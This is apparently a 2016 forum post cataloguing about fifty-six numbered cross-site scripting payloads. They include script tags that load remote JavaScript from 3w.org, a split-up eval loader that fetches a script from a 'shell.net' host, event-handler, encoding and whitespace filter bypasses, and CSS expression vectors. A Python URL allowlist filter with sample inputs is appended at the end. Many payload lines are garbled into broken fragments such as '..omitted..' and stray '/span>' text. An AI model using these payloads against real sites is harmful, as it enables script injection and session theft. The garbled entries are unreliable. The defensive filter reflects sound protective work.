XSS Attack Summary

Posted on 2016-4-28 10:06:15
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative pop-up boxes
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag without semicolons or quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode tag (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Working around character limits (the snippets must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters basically have no effect domestically, since there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag with spaces and meta characters in front
<IMG SRC=\'#\'"   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS to 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS to 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escape-filtered JavaScript
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META with linked URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed Flash that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>
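A defensive counterpart to the SRC/HREF vectors in the post (items 3 to 19 and 25), added here as an example and not part of the original post: a URL allowlist check that first undoes the character references, embedded tab/newline/CR/NUL and leading whitespace those payloads rely on, then compares the scheme case-insensitively. The http(s)-only allowlist and the sample inputs are assumptions constructed for this example.

```python
import html
import re

# Assumption (not from the post): the application only ever links to http(s).
ALLOWED_SCHEMES = {"http", "https"}

# Browsers drop tab/LF/CR anywhere in a URL, trim leading C0 controls/spaces
# and compare the scheme case-insensitively; NUL is dropped here as well.
_IGNORED = re.compile(r"[\x00\t\n\r]")
_LEADING = re.compile(r"^[\x00-\x20]+")
_SCHEME = re.compile(r"^([a-z][a-z0-9+.-]*):", re.I)

def normalise_url(raw: str) -> str:
    """Undo the obfuscations in the post's IMG vectors before the scheme is
    inspected: character references with or without semicolons, embedded
    tab/LF/CR/NUL, and leading whitespace or control characters."""
    url = html.unescape(raw)       # &#106; &#x6A; and &#106 all decode to 'j'
    url = _IGNORED.sub("", url)    # 'jav<TAB>ascript' -> 'javascript'
    url = _LEADING.sub("", url)    # '  &#14;  javascript:' -> 'javascript:'
    return url.replace("\\", "/")  # http(s) URL parsing treats '\' as '/'

def is_safe_url(raw: str) -> bool:
    """Allowlist check for SRC/HREF/BACKGROUND/url() values: only http(s)
    passes, and protocol-relative '//host' URLs fail because they load from
    an attacker-chosen host, as the post's '//3w.org/XSS/xss.js' does."""
    url = normalise_url(raw)
    if url.startswith("//"):
        return False
    m = _SCHEME.match(url)
    if m is None:                  # path-relative or query-only: no scheme
        return True
    return m.group(1).lower() in ALLOWED_SCHEMES

# Constructed inputs modelled on the post's vectors, plus two benign URLs.
SAMPLES = {
    "javascript:alert('XSS')": False,
    "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')": False,
    "&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58alert('XSS')": False,
    "jav&#x09;ascript:alert('XSS')": False,
    "jav\nascript:alert('XSS')": False,
    "java\0script:alert('XSS')": False,
    "  &#14;  javascript:alert('XSS')": False,
    "//3w.org/XSS/xss.js": False,
    "https://example.com/logo.png": True,
    "/static/logo.png?v=2": True,
}

def check_samples() -> bool:
    return all(is_safe_url(u) is ok for u, ok in SAMPLES.items())
```

This check only covers URL-bearing attributes; the event-handler vectors in (99) and (21) need element/attribute allowlisting or output encoding, which no URL filter provides.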